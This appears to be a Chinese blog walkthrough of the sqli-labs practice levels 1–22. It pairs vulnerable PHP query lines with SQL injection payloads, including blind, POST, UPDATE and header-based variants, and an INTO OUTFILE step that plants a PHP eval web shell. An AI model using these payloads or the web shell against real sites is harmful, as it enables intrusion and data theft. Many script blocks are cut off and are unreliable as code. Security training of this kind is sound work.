前言
博主本质:日更(×) 日咕(✓)
目前记录到Less-22 :-)
Creeper?
Awww man.
Less-1
源码:
1 | $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; |
payload:
1 | ?id=-1' union select 1,2,database() --+ |
Less-2
源码:
1 | $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; |
payload:
1 | ?id=-1 union select 1,2,user() --+ |
Less-3
源码:
1 | $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; |
payload:
1 | ?id=-1') union select 1,2,user() --+ |
Less-4
源码:
1 | $id = '"' . $id . '"'; // 加了双引号,单引号不被解析 |
payload:
1 | ?id=-1") union select 1,2,database() --+ |
Less-5
考察点:布尔盲注、报错注入
源码:
1 | $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; |
payload1:
1 | # -- coding: utf-8 -- |
payload2:
1 |
|
Less-6
单引号变为双引号,修改一下Less-5的payload即可。
Less-7
考察点:sql文件操作
源码:
1 | $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; |
提示我们用outfile,我们可以写一个shell进去。
payload:
1 | ?id=1')) union select 1,2,'<script language='php'>@eval($_POST['sketch_pl4ne'])</script>' into outfile 'C:\\xxx\\xxx\\xxx\\output.php' --+ 需要是绝对路径 |
蚁剑连接:
Less-8
考察点:布尔盲注
源码:
1 | $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; |
PS:看代码要仔细,这里不输出错误信息,只能盲注。
payload:
1 | # -- coding: utf-8 -- |
Less-9
考察点:时间盲注
源码:
1 | $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; |
这里都会输出You are in...........
,也就是说根据返回页面无法判断语句是否执行成功。
所以这里我们用时间盲注。
payload:
1 | # -- coding: utf-8 -- |
Less-10
源码:
1 | $id = '"'.$id.'"'; |
payload:
单引号改为双引号 ,payload参考上一题= =
Less-11
考察点:POST注入
目前来说与GET并没有太大区别,之后讲宽字节注入时会加以区分。
源码:
1 | if(isset($_POST['uname']) && isset($_POST['passwd'])) |
payload:
1 | uname=admin' or 1 # |
Less-12
源码:
1 | $uname=$_POST['uname']; |
payload:
Less-11的传参添加双引号,参考上一题。
Less-13
考察点:布尔盲注
源码:
1 | @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1"; |
发现没有回显,但是有图片成功或者失败的提示,考虑布尔盲注。
payload:
脚本编写参考Less-8,关键是找到有不同回显的地方,当然以及注入点。
Less-14
源码:
1 | $uname='"'.$uname.'"'; |
payload:
脚本编写参考Less-8。
Less-15
源码:
1 | $uname=$_POST['uname']; |
payload:
换汤不换药,采用布尔盲注与时间盲注均可。
Less-16
源码:
1 | $uname=$_POST['uname']; |
payload:
依然是换汤不换药,但也提醒我们要留意参数可能存在的情况:’$id’,”$id”,($id),(“$id”),(‘$id’),(($id))等等。
Less-17
考察点:update语句注入
源码:
1 | //有点狠的过滤 |
payload:
1 | uname=sketch_pl4ne |
Less-18
考察点:HTTP头部注入–UA
源码:
1 | $uagent = $_SERVER['HTTP_USER_AGENT']; |
payload:
1 | //抓包修改UA |
Less-19
考察点:HTTP头部注入–Referer
源码:
1 | $uagent = $_SERVER['HTTP_REFERER']; |
payload:
1 | //抓包改Referer |
Less-20
考察点:HTTP头部注入–Cookie
源码:
1 | $cookee = $_COOKIE['uname']; |
payload:
1 | //抓包改Cookie['uname'] |
Less-21
考察点:HTTP头部注入–Cookie、base64编码
源码:
1 | $cookee = $_COOKIE['uname']; |
payload:
1 | //抓包改Cookie['uname'] |
Less-22
源码:
1 | $cookee = $_COOKIE['uname']; |
payload:
1 | //抓包改Cookie['uname'] |
小结
英语作文还没写,wsl。。。
PPT还没写,wsl。。。
我感觉💊
虽然明天满课(还有两篇英语作文awsl),还是争取写出来八。